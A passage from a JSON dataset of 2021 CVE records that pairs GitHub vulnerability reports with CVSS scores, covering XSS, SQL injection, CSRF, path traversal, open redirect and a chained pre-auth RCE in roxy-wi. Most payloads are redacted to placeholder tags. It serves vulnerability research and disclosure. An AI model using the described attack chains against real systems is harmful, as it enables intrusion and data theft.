  69229. "Issue_Url_old": "https://github.com/osqzss/gps-sdr-sim/issues/294",
  69230. "Issue_Url_new": "https://github.com/osqzss/gps-sdr-sim/issues/294",
  69231. "Repo_new": "osqzss/gps-sdr-sim",
  69232. "Issue_Created_At": "2021-07-23T13:23:33Z",
  69233. "description": "There is a buffer overflow when parsing command line parameters. Hi friends! When the parameter length is greater than NUMBERTAG characters of MAX_CHAR, the strcpy function overflows. The length check can be performed to fix the problem. APITAG CODETAG",
  69234. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69235. "severity": "CRITICAL",
  69236. "baseScore": 9.8,
  69237. "impactScore": 5.9,
  69238. "exploitabilityScore": 3.9
  69239. },
  69240. {
  69241. "CVE_ID": "CVE-2021-37786",
  69242. "Issue_Url_old": "https://github.com/admin-ch/CovidCertificate-App-iOS/issues/146",
  69243. "Issue_Url_new": "https://github.com/admin-ch/covidcertificate-app-ios/issues/146",
  69244. "Repo_new": "admin-ch/covidcertificate-app-ios",
  69245. "Issue_Created_At": "2021-07-16T14:31:40Z",
  69246. "description": "Covid Check APITAG Crash App (dos). Hello, Small issue, a person could generate a QR code readable by the application (with an invalid signature), with the parameter \"dn\" containing the value APITAG the application will crashes each time the QR code is scanned, the problem is also present on Covid Cert but less problematic, indeed a possible scenario (with a bit of social engineering) is that a person creates a QR code with the payload that crashes the application and presents it to a third party (a restaurant for example), The third party can't check the validity of the certificate because the application will crashes at each scan, the third party could let the access to these services thinking that the certificate is valid and that it's a bug of the application. APITAG maybe extreme but with a lot of chances that it works). Payload : CODETAG APITAG Payload : CODETAG FILETAG Hoping to have helped ^^",
  69247. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69248. "severity": "MEDIUM",
  69249. "baseScore": 4.6,
  69250. "impactScore": 3.6,
  69251. "exploitabilityScore": 0.9
  69252. },
  69253. {
  69254. "CVE_ID": "CVE-2021-37791",
  69255. "Issue_Url_old": "https://github.com/cdfan/my-admin/issues/3",
  69256. "Issue_Url_new": "https://github.com/cdfan/my-admin/issues/3",
  69257. "Repo_new": "cdfan/my-admin",
  69258. "Issue_Created_At": "2021-07-28T06:35:05Z",
  69259. "description": "There is an ultra vires vulnerability in viewing personal center. Log in with user1 account on the trial website given by the author, and click the personal center to capture the package. poc: user1 login > PATHTAG CODETAG FILETAG",
  69260. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  69261. "severity": "MEDIUM",
  69262. "baseScore": 4.9,
  69263. "impactScore": 3.6,
  69264. "exploitabilityScore": 1.2
  69265. },
  69266. {
  69267. "CVE_ID": "CVE-2021-37840",
  69268. "Issue_Url_old": "https://github.com/aaPanel/aaPanel/issues/74",
  69269. "Issue_Url_new": "https://github.com/aapanel/aapanel/issues/74",
  69270. "Repo_new": "aapanel/aapanel",
  69271. "Issue_Created_At": "2021-06-23T07:11:42Z",
  69272. "description": "Security Vulnerability in APITAG Hi, I would like to report a security vulnerability in APITAG I am not sure this is the right place as its public and visible to all, would you like me to post the details here? or email?",
  69273. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69274. "severity": "HIGH",
  69275. "baseScore": 8.8,
  69276. "impactScore": 5.9,
  69277. "exploitabilityScore": 2.8
  69278. },
  69279. {
  69280. "CVE_ID": "CVE-2021-37914",
  69281. "Issue_Url_old": "https://github.com/argoproj/argo-workflows/issues/6441",
  69282. "Issue_Url_new": "https://github.com/argoproj/argo-workflows/issues/6441",
  69283. "Repo_new": "argoproj/argo-workflows",
  69284. "Issue_Created_At": "2021-07-28T16:14:54Z",
  69285. "description": "workflow re write vulnerability using input parameter. Summary It's possible to rewrite parts of a workflow on cluster using only an input parameter. Operators who allows users to run workflows specifying input parameters are vulnerable to this. Details From MENTIONTAG : It's possible to rewrite parts of a workflow on cluster using only an input parameter. This relies on taking advantage of the fact that the output of expression templates is evaluated a a literal part of the JSON stringified template. The following workflow accepts a string param, performs a trivial transformation (in this case, just printing it), and then passes the output as an env var to be printed. The poisoned param value is able to overwrite \"args\" because NUMBERTAG the golang JSON marshaler allows duplicate keys and NUMBERTAG the stringified template keys seem to be alphabetically ordered, so the poisoned \"env\" value can override the original \"args\" field. This is just a quick proof of concept. The motivated attacker could probably find a lot of different and nefarious ways to mutate a workflow. I believe this PR would close the vulnerability: URLTAG ERRORTAG Note: there seems to be some non determinism involved. The expected behavior is for the \"print\" step to output \"this happens instead\". If instead you get an error, re submit a few times. APITAG Message from the maintainers : Impacted by this bug? Give it a \ud83d\udc4d. We prioritise the issues with the most \ud83d\udc4d.",
  69286. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
  69287. "severity": "MEDIUM",
  69288. "baseScore": 6.5,
  69289. "impactScore": 2.5,
  69290. "exploitabilityScore": 3.9
  69291. },
  69292. {
  69293. "CVE_ID": "CVE-2021-3807",
  69294. "Issue_Url_old": "https://github.com/chalk/ansi-regex/issues/38",
  69295. "Issue_Url_new": "https://github.com/chalk/ansi-regex/issues/38",
  69296. "Repo_new": "chalk/ansi-regex",
  69297. "Issue_Created_At": "2021-09-14T15:37:45Z",
  69298. "description": "Backport of security patch, for benefit of yargs. I know it's a pain in the neck, but would you consider back porting URLTAG to the NUMBERTAG release line, for the benefit of yargs URLTAG . Yargs is making the effort during the transition to ESM to support both CJS and ESM, which makes us unable to update to the latest version of APITAG . If you were willing to make an exception (_I know you're pushing folks towards using ESM exclusively_) it would be really valuable for yargs users using CJK character sets.",
  69299. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69300. "severity": "HIGH",
  69301. "baseScore": 7.5,
  69302. "impactScore": 3.6,
  69303. "exploitabilityScore": 3.9
  69304. },
  69305. {
  69306. "CVE_ID": "CVE-2021-38113",
  69307. "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/1387",
  69308. "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/1387",
  69309. "Repo_new": "e2openplugins/e2openplugin-openwebif",
  69310. "Issue_Created_At": "2021-08-04T12:12:19Z",
  69311. "description": "Stored XSS bug.. Description Inserting APITAG code into the APITAG Bouquet\" function in the Bouquet Editor leads to Stored XSS. The payload in the APITAG executes each time the user goes to the OWIF interface and redirects to a different webpage. APITAG Link to streamable URLTAG Image OS: APITAG Version NUMBERTAG Desktop Browser APITAG Version APITAG CODETAG",
  69312. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69313. "severity": "MEDIUM",
  69314. "baseScore": 5.4,
  69315. "impactScore": 2.7,
  69316. "exploitabilityScore": 2.3
  69317. },
  69318. {
  69319. "CVE_ID": "CVE-2021-38115",
  69320. "Issue_Url_old": "https://github.com/libgd/libgd/issues/697",
  69321. "Issue_Url_new": "https://github.com/libgd/libgd/issues/697",
  69322. "Repo_new": "libgd/libgd",
  69323. "Issue_Created_At": "2021-04-30T18:12:52Z",
  69324. "description": "Read out of bound in TGA files. hello, this issue URLTAG is showing a read out of bound for a corrupted TGA FILETAG which is patched by adding some checks for APITAG . although the patch prevents occurring this vulnerability I saw that this function ( APITAG ) is used in APITAG too which there is no check for its return value again. I changed the header of the file which was used for the previous CVETAG . In fact, I changed the first byte to ff which is assigned to APITAG . FILETAG APITAG when I run the test with this input file ASAN shows this: ERRORTAG Is it showing another vulnerability?",
  69325. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69326. "severity": "MEDIUM",
  69327. "baseScore": 6.5,
  69328. "impactScore": 3.6,
  69329. "exploitabilityScore": 2.8
  69330. },
  69331. {
  69332. "CVE_ID": "CVE-2021-38138",
  69333. "Issue_Url_old": "https://github.com/helloxz/onenav/issues/26",
  69334. "Issue_Url_new": "https://github.com/helloxz/onenav/issues/26",
  69335. "Repo_new": "helloxz/onenav",
  69336. "Issue_Created_At": "2021-08-05T06:53:41Z",
  69337. "description": "APITAG add link function exists xss vul. add link function path FILETAG input xss payload NUMBERTAG APITAG alert(\"XSS\") APITAG FILETAG click \u6dfb\u52a0 button FILETAG alert xss success input xss payload NUMBERTAG APITAG APITAG FILETAG Get user cookie success",
  69338. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69339. "severity": "MEDIUM",
  69340. "baseScore": 5.4,
  69341. "impactScore": 2.7,
  69342. "exploitabilityScore": 2.3
  69343. },
  69344. {
  69345. "CVE_ID": "CVE-2021-38167",
  69346. "Issue_Url_old": "https://github.com/hap-wi/roxy-wi/issues/285",
  69347. "Issue_Url_new": "https://github.com/hap-wi/roxy-wi/issues/285",
  69348. "Repo_new": "hap-wi/roxy-wi",
  69349. "Issue_Created_At": "2021-08-07T10:27:37Z",
  69350. "description": "multiple vulnerabilities leading to preauth RCE. i found haproxy wi in aws/digitalocean marketplace when i was looking for a solution to manage multiple reverse proxies, since it was opensource i peaked at how it works and found some critical issues when combined leading to pre auth RCE \\ SQL injections: Inside APITAG some SQL statements have user controlled input supplied directly into SQL queries \\ \\ Unauthenticated SQLi when an attacker request any of the pages inside APITAG folder, authentication is checked via APITAG CODETAG APITAG takes uuid cookie value and try to update expiration timestamp for the given uuid with APITAG ERRORTAG uuid cookie value is directly supplied into the query, so an unauthenticated attacker can perform a blind SQL injection to dump the database or extract a valid uuid to bypass authentication \\ \\ authenticated SQLi One example of authenticated SQLi via reaching select_servers function ERRORTAG there's multiple injection points from user supplied input here one way to reach this is from hapservers.py CODETAG this could be exploited by least privilege account such as guest There's some more functions supplying user input to SQL queries \\ Command injection: Inside APITAG and APITAG some commands executed are supplied with user input one of many examples of a second order command injection here: CODETAG haproxy_sock_port is stored in settings table, and an authenticated user can change it from APITAG then calls options page to call that function and execute arbitrary system command most cmds in different functions are prone to command injection or second order from settings stored in the database and user controlled \\ Conclusion combining both unauthenticated SQLi to grab a valid uuid and bypass authentication, then use command injection an unauthenticated user can achieve pre auth RCE",
  69351. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69352. "severity": "CRITICAL",
  69353. "baseScore": 9.8,
  69354. "impactScore": 5.9,
  69355. "exploitabilityScore": 3.9
  69356. },
  69357. {
  69358. "CVE_ID": "CVE-2021-38197",
  69359. "Issue_Url_old": "https://github.com/gen2brain/go-unarr/issues/21",
  69360. "Issue_Url_new": "https://github.com/gen2brain/go-unarr/issues/21",
  69361. "Repo_new": "gen2brain/go-unarr",
  69362. "Issue_Created_At": "2021-08-08T06:51:14Z",
  69363. "description": "There is a vulnerability in unarr, which will lead to path traversal vulnerability. There is a vulnerability in unarr, which will lead to path traversal vulnerability Go unarr does not check the contents of the archive. Exploit process NUMBERTAG An attacker can construct a malicious tar package (or any compressed archive file). As shown in the figure below, obviously, this will not succeed under the tar command, because the tar command fixes the vulnerability. FILETAG NUMBERTAG The victim uses go unarr to unzip the archive As shown in the figure below, path traversal occurs during go unarr decompression, and we upload the file to the.. / directory FILETAG NUMBERTAG By triggering the path traversal vulnerability, an attacker can store any file in any privileged place (which means that rce can be caused under root privileges)",
  69364. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69365. "severity": "CRITICAL",
  69366. "baseScore": 9.8,
  69367. "impactScore": 5.9,
  69368. "exploitabilityScore": 3.9
  69369. },
  69370. {
  69371. "CVE_ID": "CVE-2021-38221",
  69372. "Issue_Url_old": "https://github.com/mlogclub/bbs-go/issues/112",
  69373. "Issue_Url_new": "https://github.com/mlogclub/bbs-go/issues/112",
  69374. "Repo_new": "mlogclub/bbs-go",
  69375. "Issue_Created_At": "2021-07-08T08:49:52Z",
  69376. "description": "There are several stored XSS vulnerabilities. Affected version NUMBERTAG all versions yet) Including Custom Edition I guess. Usage of \"v html\" tag should be really careful in vue. I found several unsafe usage in bbs go webpage which data source might be from any user. It's necessary to filter the rich text before it is posted to the client. Otherwise it will be dangerous. Here is the XSS attack example screenshot (one of them) : FILETAG And the unsafe \"v html\" tag for topic content (one of them) : FILETAG I will report the poc code after mlogclub team confirm and fix this defect.",
  69377. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69378. "severity": "MEDIUM",
  69379. "baseScore": 5.4,
  69380. "impactScore": 2.7,
  69381. "exploitabilityScore": 2.3
  69382. },
  69383. {
  69384. "CVE_ID": "CVE-2021-38290",
  69385. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/580",
  69386. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/580",
  69387. "Repo_new": "daylightstudio/fuel-cms",
  69388. "Issue_Created_At": "2021-08-06T01:58:06Z",
  69389. "description": "Host header attack vulnerability exists in fuel CMS NUMBERTAG An attacker can use man in the middle attack to attack users such as phishing.. The system does not verify the host value. If the host value is modified, the link returned by the website will splice the malicious host value\u3002like this\uff1a FILETAG FILETAG",
  69390. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69391. "severity": "HIGH",
  69392. "baseScore": 8.1,
  69393. "impactScore": 5.9,
  69394. "exploitabilityScore": 2.2
  69395. },
  69396. {
  69397. "CVE_ID": "CVE-2021-38311",
  69398. "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2685",
  69399. "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2685",
  69400. "Repo_new": "contiki-os/contiki",
  69401. "Issue_Created_At": "2021-08-08T13:24:15Z",
  69402. "description": "Telnet servers potentially lead to nonterminating acknowledgment loops. Hello, In the implementation of telnet servers until version NUMBERTAG and even the latest commit NUMBERTAG b5b NUMBERTAG potential nonterminating acknowledgment loops have been found in telnet servers. In order to prevent nonterminating acknowledgment loops, one rule made by RFC NUMBERTAG URLTAG is that, a request must not be acknowledged if a party receives what appears to be the request to enter some mode it is already in. However, when the negotiated options are already disabled, servers still respond to DONT and WONT requests with WONT or DONT commands. Hence, potential infinite acknowledgment loops exist in the telnet server during execution, which may lead to denial of service and excessive CPU consumption. Could you have a check? Thanks a lot.",
  69403. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69404. "severity": "HIGH",
  69405. "baseScore": 7.5,
  69406. "impactScore": 3.6,
  69407. "exploitabilityScore": 3.9
  69408. },
  69409. {
  69410. "CVE_ID": "CVE-2021-38384",
  69411. "Issue_Url_old": "https://github.com/dherault/serverless-offline/issues/1259",
  69412. "Issue_Url_new": "https://github.com/dherault/serverless-offline/issues/1259",
  69413. "Repo_new": "dherault/serverless-offline",
  69414. "Issue_Created_At": "2021-08-05T18:28:59Z",
  69415. "description": "Custom Authorizer and AWS deployed stack don't have the same behavior. Bug Report APITAG Current Behavior APITAG When using a Custom Authorizer, the behaviour of serverless offline differs from the deployed stack on AWS. Sample Code APITAG This is where we define the function event trigger. As it's clear to see, we expect a HTTP POST on APITAG file: FILETAG APITAG Our custom authorizer APITAG method looks like this. file: FILETAG CODETAG We're basically generating the following policy to someone with the role \"USER\": CODETAG Expected behavior/code APITAG When testing locally using serverless offline, fetching the endpoint URLTAG the response is NUMBERTAG Forbidden as the screenshot shows URLTAG . But when we deploy the stack to AWS, fetching the endpoint URLTAG the result is NUMBERTAG ok as its seen here URLTAG . Environment serverless version NUMBERTAG APITAG version NUMBERTAG APITAG version: APITAG OS : Linux Mint NUMBERTAG Tessa Additional APITAG APITAG We found this issue while doing the research The Fault in Our Stars URLTAG , in which we explore how API Gateway Execute API Policy works under different conditions. One researcher from our company opened the issue NUMBERTAG URLTAG where he indicates another incorrectly behaviour by serverless offline regarding the way it evaluates policies. It still lacks a response to this date.",
  69416. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69417. "severity": "CRITICAL",
  69418. "baseScore": 9.8,
  69419. "impactScore": 5.9,
  69420. "exploitabilityScore": 3.9
  69421. },
  69422. {
  69423. "CVE_ID": "CVE-2021-38386",
  69424. "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2687",
  69425. "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2687",
  69426. "Repo_new": "contiki-os/contiki",
  69427. "Issue_Created_At": "2021-08-08T13:52:04Z",
  69428. "description": "Incorrectly executing commands of telnet servers. Telnet servers can execute many commands from clients like _ls_, _help_, _write_ and _append_. For example, the _ls_ command is able to show the contents of a certain directory in remote servers, and then servers reply executing results to clients. However, telnet servers don't correctly handle all commands. This bug could be reproduced in the case of showing the content of a directory with many files.",
  69429. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69430. "severity": "HIGH",
  69431. "baseScore": 7.5,
  69432. "impactScore": 3.6,
  69433. "exploitabilityScore": 3.9
  69434. },
  69435. {
  69436. "CVE_ID": "CVE-2021-38387",
  69437. "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2688",
  69438. "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2688",
  69439. "Repo_new": "contiki-os/contiki",
  69440. "Issue_Created_At": "2021-08-08T14:00:28Z",
  69441. "description": "Silent quit of telnet servers leading to clients waiting forever. After telnet clients connect with telnet servers and send requests to servers, clients are blocked until receiving the responses from servers. So when the telnet server interrupts unexpectedly, the server should give an alert to clients. However, telnet servers often quit silently, thereby leading to clients waiting forever.",
  69442. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69443. "severity": "HIGH",
  69444. "baseScore": 7.5,
  69445. "impactScore": 3.6,
  69446. "exploitabilityScore": 3.9
  69447. },
  69448. {
  69449. "CVE_ID": "CVE-2021-3850",
  69450. "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/793",
  69451. "Issue_Url_new": "https://github.com/adodb/adodb/issues/793",
  69452. "Repo_new": "adodb/adodb",
  69453. "Issue_Created_At": "2022-01-16T15:49:35Z",
  69454. "description": "Reserved.",
  69455. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  69456. "severity": "CRITICAL",
  69457. "baseScore": 9.1,
  69458. "impactScore": 5.2,
  69459. "exploitabilityScore": 3.9
  69460. },
  69461. {
  69462. "CVE_ID": "CVE-2021-38712",
  69463. "Issue_Url_old": "https://github.com/helloxz/onenav/issues/25",
  69464. "Issue_Url_new": "https://github.com/helloxz/onenav/issues/25",
  69465. "Repo_new": "helloxz/onenav",
  69466. "Issue_Created_At": "2021-08-04T08:58:49Z",
  69467. "description": "disclosure of information about sqlite. disclosure of information about sqlite I download this cms and i first install it . FILETAG APITAG CODETAG bug code : APITAG then i try to require PATHTAG and PATHTAG http response status NUMBERTAG it means i can download onenav.db3 and FILETAG can gets some privacy information you can add some random code to document name or sqlite database name . this cms has many users.",
  69468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  69469. "severity": "HIGH",
  69470. "baseScore": 7.5,
  69471. "impactScore": 3.6,
  69472. "exploitabilityScore": 3.9
  69473. },
  69474. {
  69475. "CVE_ID": "CVE-2021-38713",
  69476. "Issue_Url_old": "https://github.com/helloxz/imgurl/issues/72",
  69477. "Issue_Url_new": "https://github.com/helloxz/imgurl/issues/72",
  69478. "Repo_new": "helloxz/imgurl",
  69479. "Issue_Created_At": "2021-08-16T02:29:43Z",
  69480. "description": "Store Cross Site Script Attack on Upload HTTP Request Header . Hi, how is going? I test imgurl upload functions. And I found a XSS vulnarability. First step\uff1a Put payload on upload header : ERRORTAG FILETAG FILETAG Second then web administrator click FILETAG FILETAG FILETAG The method to solve it: all the request header filter special character\u3002 \u8fc7\u6ee4http\u8bf7\u6c42\u5934\u7684\u6240\u6709\u7279\u6b8a\u5b57\u7b26\u3002",
  69481. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69482. "severity": "MEDIUM",
  69483. "baseScore": 5.4,
  69484. "impactScore": 2.7,
  69485. "exploitabilityScore": 2.3
  69486. },
  69487. {
  69488. "CVE_ID": "CVE-2021-38721",
  69489. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/584",
  69490. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/584",
  69491. "Repo_new": "daylightstudio/fuel-cms",
  69492. "Issue_Created_At": "2021-08-10T01:37:40Z",
  69493. "description": "FUEL CMS NUMBERTAG contains a cross site request forgery (CSRF) vulnerability. Because my mailbox function is not configured, it cannot be fully demonstrated. There is a CSRF vulnerability in the password modification page. URLTAG FILETAG csrf POC: CODETAG",
  69494. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  69495. "severity": "MEDIUM",
  69496. "baseScore": 6.5,
  69497. "impactScore": 3.6,
  69498. "exploitabilityScore": 2.8
  69499. },
  69500. {
  69501. "CVE_ID": "CVE-2021-38723",
  69502. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/583",
  69503. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/583",
  69504. "Repo_new": "daylightstudio/fuel-cms",
  69505. "Issue_Created_At": "2021-08-10T01:26:43Z",
  69506. "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'col' in PATHTAG FILETAG CODETAG payload: APITAG FILETAG FILETAG You can see that when you modify the sleep value, the response has a significant delay.",
  69507. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  69508. "severity": "HIGH",
  69509. "baseScore": 8.8,
  69510. "impactScore": 5.9,
  69511. "exploitabilityScore": 2.8
  69512. },
  69513. {
  69514. "CVE_ID": "CVE-2021-38725",
  69515. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/581",
  69516. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/581",
  69517. "Repo_new": "daylightstudio/fuel-cms",
  69518. "Issue_Created_At": "2021-08-09T03:09:21Z",
  69519. "description": "Fuel CMS NUMBERTAG has a brute force vulnerability . IN the forgot password page. Because there is no limit on the number of times, An attacker can brute crack the email address of the administrator. FILETAG FILETAG FILETAG",
  69520. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  69521. "severity": "MEDIUM",
  69522. "baseScore": 5.3,
  69523. "impactScore": 1.4,
  69524. "exploitabilityScore": 3.9
  69525. },
  69526. {
  69527. "CVE_ID": "CVE-2021-38727",
  69528. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/582",
  69529. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/582",
  69530. "Repo_new": "daylightstudio/fuel-cms",
  69531. "Issue_Created_At": "2021-08-10T01:22:52Z",
  69532. "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'col' in PATHTAG FILETAG FILETAG CODETAG payload : APITAG FILETAG FILETAG You can see that when you modify the sleep value, the response has a significant delay.",
  69533. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69534. "severity": "CRITICAL",
  69535. "baseScore": 9.8,
  69536. "impactScore": 5.9,
  69537. "exploitabilityScore": 3.9
  69538. },
  69539. {
  69540. "CVE_ID": "CVE-2021-38751",
  69541. "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/1544",
  69542. "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/1544",
  69543. "Repo_new": "exponentcms/exponent-cms",
  69544. "Issue_Created_At": "2021-08-10T04:04:36Z",
  69545. "description": "HTTP Host Header Attack. Host value in HTTP header is not checked. Modifying Host header in HTTP request modifies the all links to an arbitrary value. Included example request, result, and location of bug in the source code. FILETAG",
  69546. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  69547. "severity": "MEDIUM",
  69548. "baseScore": 4.3,
  69549. "impactScore": 1.4,
  69550. "exploitabilityScore": 2.8
  69551. },
  69552. {
  69553. "CVE_ID": "CVE-2021-38754",
  69554. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/7",
  69555. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/7",
  69556. "Repo_new": "kishan0725/hospital-management-system",
  69557. "Issue_Created_At": "2021-08-11T02:47:29Z",
  69558. "description": "SQL Injection Vulnerability in Message Search. Intercept message search and save contents into a text file. FILETAG Run APITAG FILETAG",
  69559. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69560. "severity": "CRITICAL",
  69561. "baseScore": 9.8,
  69562. "impactScore": 5.9,
  69563. "exploitabilityScore": 3.9
  69564. },
  69565. {
  69566. "CVE_ID": "CVE-2021-38755",
  69567. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/5",
  69568. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/5",
  69569. "Repo_new": "kishan0725/hospital-management-system",
  69570. "Issue_Created_At": "2021-08-11T02:12:04Z",
  69571. "description": "Unauthenticated Doctor Deletion Vulnerability. Crafted HTTP packet can delete doctors without being authenticated as receptionist/admin. FILETAG Before: FILETAG After: FILETAG",
  69572. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  69573. "severity": "MEDIUM",
  69574. "baseScore": 5.3,
  69575. "impactScore": 1.4,
  69576. "exploitabilityScore": 3.9
  69577. },
  69578. {
  69579. "CVE_ID": "CVE-2021-38756",
  69580. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/4",
  69581. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/4",
  69582. "Repo_new": "kishan0725/hospital-management-system",
  69583. "Issue_Created_At": "2021-08-11T01:57:20Z",
  69584. "description": "Persistent Cross Site Scripting (XSS) Vulnerability in Prescription. Add XSS in Prescription as DOCTOR FILETAG Login as ADMIN FILETAG Persistent XSS upon logging in as ADMIN FILETAG Issue in FILETAG FILETAG",
  69585. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69586. "severity": "MEDIUM",
  69587. "baseScore": 6.1,
  69588. "impactScore": 2.7,
  69589. "exploitabilityScore": 2.8
  69590. },
  69591. {
  69592. "CVE_ID": "CVE-2021-38757",
  69593. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/6",
  69594. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/6",
  69595. "Repo_new": "kishan0725/hospital-management-system",
  69596. "Issue_Created_At": "2021-08-11T02:15:37Z",
  69597. "description": "Persistent Cross Site Scripting (XSS) Vulnerability in Contact Page. Add XSS to message section of Contact page to target receptionist/admin. FILETAG Log in as receptionist/admin. FILETAG FILETAG",
  69598. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69599. "severity": "MEDIUM",
  69600. "baseScore": 6.1,
  69601. "impactScore": 2.7,
  69602. "exploitabilityScore": 2.8
  69603. },
  69604. {
  69605. "CVE_ID": "CVE-2021-39157",
  69606. "Issue_Url_old": "https://github.com/sonicdoe/detect-character-encoding/issues/15",
  69607. "Issue_Url_new": "https://github.com/sonicdoe/detect-character-encoding/issues/15",
  69608. "Repo_new": "sonicdoe/detect-character-encoding",
  69609. "Issue_Created_At": "2018-11-06T09:49:01Z",
  69610. "description": "A native crash. CRASH STACK NUMBERTAG fbf NUMBERTAG ea NUMBERTAG in APITAG const () from PATHTAG NUMBERTAG fbf NUMBERTAG d NUMBERTAG b in APITAG const&) () from PATHTAG NUMBERTAG fbf NUMBERTAG cf NUMBERTAG in APITAG const&) () from PATHTAG USE THIS DEMO TO REAPPEARS: function APITAG { APITAG let APITAG = new Buffer('AD', 'hex'); const APITAG = require('detect character encoding'); const APITAG = APITAG APITAG APITAG } FIXUP DIFF: diff git APITAG APITAG index APITAG NUMBERTAG APITAG +++ APITAG APITAG NUMBERTAG APITAG APITAG { APITAG = APITAG APITAG + if(NULL == APITAG { + ERRORTAG to charset not match.\"); + APITAG + return; + } + APITAG { ERRORTAG to detect charset.\"); APITAG",
  69611. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69612. "severity": "HIGH",
  69613. "baseScore": 7.5,
  69614. "impactScore": 3.6,
  69615. "exploitabilityScore": 3.9
  69616. },
  69617. {
  69618. "CVE_ID": "CVE-2021-39191",
  69619. "Issue_Url_old": "https://github.com/zmartzone/mod_auth_openidc/issues/672",
  69620. "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/672",
  69621. "Repo_new": "openidc/mod_auth_openidc",
  69622. "Issue_Created_At": "2021-09-02T16:50:58Z",
  69623. "description": "open redirect for target_link_uri parameter. see URLTAG thanks MENTIONTAG Recently we have forged a URL for a phishing attack that redirects the user, after their authentication on our OP, to any site of our choice. the forged url is as follows: APITAG example: APITAG After authentication, user is redirect to FILETAG According to the APITAG Connect documentation, URLTAG > \"target_link_uri > OPTIONAL. URL that the RP is requested to redirect to after authentication. RPs MUST verify the value of the target_link_uri to prevent being used as an open redirector to external sites.\" > Does the module verify the value of the target_link_uri to prevent being used as an open redirector to external sites? and how to configure it in the module?",
  69624. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69625. "severity": "MEDIUM",
